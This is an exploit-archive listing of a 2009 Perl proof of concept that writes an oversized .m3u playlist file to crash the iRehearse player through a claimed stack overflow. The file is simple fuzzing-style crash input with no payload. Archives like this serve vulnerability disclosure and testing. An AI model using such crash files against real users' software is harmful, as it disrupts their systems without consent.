exploit-db-mirror/exploits/windows/dos/9392.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
296 B
Perl
Executable file

#!/usr/bin/perl
#iRehearse (m3u) local stack overlow POC
#finded by opt!x hacker <optix@9.cn>
#download : http://rjvmedia.co.uk/software/iRehearseTrial.zip
my $header="MILW0RM";
my $crash="A" x 40;
my $poc=$header.$crash;
open(myfile,'>>aidi.m3u');
print myfile $poc;
# milw0rm.com [2009-08-07]